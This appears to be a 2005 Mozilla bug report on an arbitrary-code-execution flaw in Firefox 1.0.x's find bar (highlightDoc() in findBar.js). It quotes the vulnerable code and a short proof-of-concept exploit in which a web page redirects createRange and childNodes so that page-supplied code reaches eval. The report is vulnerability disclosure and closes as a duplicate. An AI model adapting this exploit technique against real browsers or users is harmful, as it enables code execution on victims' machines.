User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 Vulnerability: arbitrary code execution Vulnerable code: from highlightDoc() in findBar.js win = window._content; var doc = win.document; var body = doc.body; var count = body.childNodes.length; endPt = doc.createRange(); endPt.setStart(body, count); Exploit: Web pages can overwrite the getter and the method, such as the following. usage of |eval| is similar to Bug 289074 eval.setStart = eval.call; eval.__proto__ = document.createRange(); document.createRange = function() { return eval; }; document.body.__defineGetter__('childNodes', function() { return { length : MALICIOUS_CODE }; }); I have confirmed that the following testcase works in: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404 Firefox/1.0.3 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404 Firefox/1.0+ Reproducible: Always Steps to Reproduce:

Same eval problem as reported in bug 289074. *** This bug has been marked as a duplicate of 289074 *** *** This bug has been marked as a duplicate of 289074 ***